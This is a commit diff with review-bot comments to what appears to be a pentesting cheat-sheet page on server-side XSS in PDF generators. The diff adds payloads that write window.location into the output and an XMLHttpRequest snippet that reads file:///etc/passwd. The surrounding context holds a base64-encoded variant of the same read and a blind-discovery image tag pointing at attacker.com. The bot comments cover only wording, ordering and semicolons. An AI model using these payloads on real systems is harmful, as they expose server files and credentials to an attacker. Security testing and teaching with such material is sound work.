GitBook: [master] one page modified

CPol 2021-09-08 08:59:37 +00:00 committed by gitbook-bot
parent f822e925d0
commit 52c3234894
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF


@ -13,8 +13,10 @@ Also, note that in a regular exploitation you will be **able to see/download the
### Discovery ### Discovery
```markup ```markup
<!-- Basic discovery, Write "test"--> <!-- Basic discovery, Write somthing-->
<img src="x" onerror="document.write('test')" /> <img src="x" onerror="document.write('test')" />
<script>document.write(JSON.stringify(window.location))</script>
<script>document.write('<iframe src="'+window.location.href+'"></iframe>')</script>
<!--Basic blind discovery, load a resource--> <!--Basic blind discovery, load a resource-->
<img src="http://attacker.com"/> <img src="http://attacker.com"/>
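Review bot: The reworded comment at the top of the Discovery block has a typo ("somthing") and is now less accurate than the text it replaces, because the `<img ... onerror="document.write('test')">` line under it still writes the literal string 'test'. Either keep "Write "test"" or reword it to cover all three payloads. The two added `<script>` lines also have no comment of their own: a short note saying that they print `window.location` (as JSON, and as an iframe of `window.location.href`) and what the reader should look for in the rendered output would make the purpose of the addition clear, in the same style as the "Basic blind discovery, load a resource" comment that follows.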
@ -65,7 +67,17 @@ The best conformable way to exploit this vulnerability is to abuse the vulnerabi
x=new XMLHttpRequest; x=new XMLHttpRequest;
x.onload=function(){document.write(btoa(this.responseText))}; x.onload=function(){document.write(btoa(this.responseText))};
x.open("GET","file:///etc/passwd");x.send(); x.open("GET","file:///etc/passwd");x.send();
</script> </script>
```
```markup
<script>
xhzeem = new XMLHttpRequest();
xhzeem.open("GET","file:///etc/passwd");
xhzeem.send();
xhzeem.onload = function(){document.write(this.responseText);}
xhzeem.onerror = function(){document.write('failed!')}
</script>
``` ```
```markup ```markup
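Review bot: The added `xhzeem` block repeats the request made by the block directly above it (an `XMLHttpRequest` GET to `file:///etc/passwd`) and there is no text between the two fences saying why a second variant is listed. The visible differences are the `onerror` handler and the missing `btoa()`, so either fold `onerror` into the existing snippet or add a one-line comment stating what this variant is for. In the new block itself, `onload` and `onerror` are assigned after `xhzeem.send()`; assign both handlers before calling `send()` so they are in place when the request completes. `xhzeem` is also created without a declaration, and the `onload` and `onerror` lines drop the trailing semicolons used on the lines above them.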